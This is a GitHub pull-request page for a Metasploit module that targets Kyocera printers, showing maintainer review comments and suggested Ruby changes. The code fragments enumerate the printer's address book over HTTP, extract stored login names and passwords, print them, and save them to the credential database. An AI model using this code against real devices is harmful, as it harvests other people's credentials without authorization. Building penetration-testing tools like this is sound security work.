Kyocera module #19520
Open
Kyocera module #19520
+177
−0
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
smcintyre-r7
added
module
docs
rn-modules
|
Is this ready for review and testing or is it a WIP? I don't have a test server handy to verify my suspicion but I don't see where the address book information is extracted and either saved to disk, the database or printed for the user to see. L79 makes it seem like this might be a work in progress and if that's the case we can switch it to a draft while you work on it and ask any questions about things you need help with. Thanks for the PR! |
|
I've tested it and it works - just tested it on a client network. Can
provide redacted screenshots if needed.
…On Mon, Sep 30, 2024 at 3:23 PM Spencer McIntyre ***@***.***> wrote:
Is this ready for review and testing or is it a WIP? I don't have a test
server handy to verify my suspicion but I don't see where the address book
information is extracted and either saved to disk, the database or printed
for the user to see. L79 makes it seem like this might be a work in
progress and if that's the case we can switch it to a draft while you work
on it and ask any questions about things you need help with.
Thanks for the PR!
—
Reply to this email directly, view it on GitHub
<#19520 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AOM2TZQJ24BR3INB3E5NUELZZGQJXAVCNFSM6AAAAABPD5O5UCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGOBTHE4DEMZQGA>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
--
*AJ Hammond, PNPT, CRTO, OSCP, BSCP*
Offensive Security Engineer II
Praetorian
724-977-7526 direct
<https://www.praetorian.com/>
<https://praetorianlabs.atlassian.net/wiki/label/IT/kb-how-to-article>
|
Chocapikk
reviewed
Sep 30, 2024
| end | ||
|
|
||
| def extract_enum_id(body) | ||
| xml_doc = Nokogiri::XML(body) |
There was a problem hiding this comment.
Suggested change
| xml_doc = Nokogiri::XML(body) | |
| xml_doc = res.get_xml_document |
| end | ||
| end | ||
|
|
||
| def extract_enum_id(body) |
There was a problem hiding this comment.
Suggested change
| def extract_enum_id(body) | |
| def extract_enum_id(res) |
|
|
||
| if res.code == 200 | ||
| print_good("Enumeration creation successful on #{ip}") | ||
| enum_id = extract_enum_id(res.body) |
There was a problem hiding this comment.
Suggested change
| enum_id = extract_enum_id(res.body) | |
| enum_id = extract_enum_id(res) |
jvoisin
reviewed
Oct 1, 2024
| 'data' => create_enum_body | ||
| }) | ||
|
|
||
| if res && res.code == 200 |
There was a problem hiding this comment.
Suggested change
| if res && res.code == 200 | |
| if res&.code == 200 |
Comment on lines
+93
to
+97
| if res && res.code == 200 | ||
| parse_response(res.body) | ||
| else | ||
| print_error("Failed to retrieve address book information from #{ip}") | ||
| end |
There was a problem hiding this comment.
Suggested change
| if res && res.code == 200 | |
| parse_response(res.body) | |
| else | |
| print_error("Failed to retrieve address book information from #{ip}") | |
| end | |
| if res&.code != 200 | |
| print_error("Failed to retrieve address book information from #{ip}") | |
| return | |
| end | |
| parse_response(res.body) |
| print_good("Enumeration creation successful on #{ip}") | ||
| enum_id = extract_enum_id(res.body) | ||
|
|
||
| if enum_id |
There was a problem hiding this comment.
You might want to invert this condition to reduce the nested indentations level.
Comment on lines
+116
to
+148
| if addresses.empty? | ||
| print_error("No address book entries found.") | ||
| else | ||
| addresses.each do |address| | ||
| email = address&.text # using `kmaddrbook:address` for email | ||
| login_name = address.at_xpath('kmaddrbook:login_name')&.text | ||
| login_password = address.at_xpath('kmaddrbook:login_password')&.text | ||
| name = address.at_xpath('kmaddrbook:name_information')&.text | ||
|
|
||
| # Only print relevant information: email, login name, and password | ||
| print_good("Email: #{email}") if email | ||
| print_good("Name: #{name}") if name | ||
| print_good("Username: #{login_name}") if login_name | ||
| print_good("Password: #{login_password}") if login_password | ||
|
|
||
| # Store credentials in Metasploit's credential database if login credentials are found | ||
| if login_name && login_password | ||
| credential_data = { | ||
| origin_type: :service, | ||
| module_fullname: fullname, | ||
| username: login_name, | ||
| private_data: login_password, | ||
| private_type: :password, | ||
| address: rhost, | ||
| port: rport, | ||
| service_name: 'http', | ||
| protocol: 'tcp' | ||
| } | ||
|
|
||
| create_credential(credential_data) | ||
| end | ||
| end | ||
| end |
There was a problem hiding this comment.
Suggested change
| if addresses.empty? | |
| print_error("No address book entries found.") | |
| else | |
| addresses.each do |address| | |
| email = address&.text # using `kmaddrbook:address` for email | |
| login_name = address.at_xpath('kmaddrbook:login_name')&.text | |
| login_password = address.at_xpath('kmaddrbook:login_password')&.text | |
| name = address.at_xpath('kmaddrbook:name_information')&.text | |
| # Only print relevant information: email, login name, and password | |
| print_good("Email: #{email}") if email | |
| print_good("Name: #{name}") if name | |
| print_good("Username: #{login_name}") if login_name | |
| print_good("Password: #{login_password}") if login_password | |
| # Store credentials in Metasploit's credential database if login credentials are found | |
| if login_name && login_password | |
| credential_data = { | |
| origin_type: :service, | |
| module_fullname: fullname, | |
| username: login_name, | |
| private_data: login_password, | |
| private_type: :password, | |
| address: rhost, | |
| port: rport, | |
| service_name: 'http', | |
| protocol: 'tcp' | |
| } | |
| create_credential(credential_data) | |
| end | |
| end | |
| end | |
| if addresses.empty? | |
| print_error("No address book entries found.") | |
| return | |
| end | |
| addresses.each do |address| | |
| email = address&.text # using `kmaddrbook:address` for email | |
| login_name = address.at_xpath('kmaddrbook:login_name')&.text | |
| login_password = address.at_xpath('kmaddrbook:login_password')&.text | |
| name = address.at_xpath('kmaddrbook:name_information')&.text | |
| # Only print relevant information: email, login name, and password | |
| vprint_good("Email: #{email}") if email | |
| vprint_good("Name: #{name}") if name | |
| vprint_good("Username: #{login_name}") if login_name | |
| vprint_good("Password: #{login_password}") if login_password | |
| if login_name && login_password | |
| create_credential({ | |
| origin_type: :service, | |
| module_fullname: fullname, | |
| username: login_name, | |
| private_data: login_password, | |
| private_type: :password, | |
| address: rhost, | |
| port: rport, | |
| service_name: 'http', | |
| protocol: 'tcp' | |
| }) | |
| end | |
| end |
| @@ -0,0 +1,27 @@ | |||
| ## Vulnerable Application | |||
There was a problem hiding this comment.
It might be a good idea to refer to some off our other module docs and add console outputs snippets and so on.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Added unique branch, added Kyocera module with documentation, ran msftidy and rubocop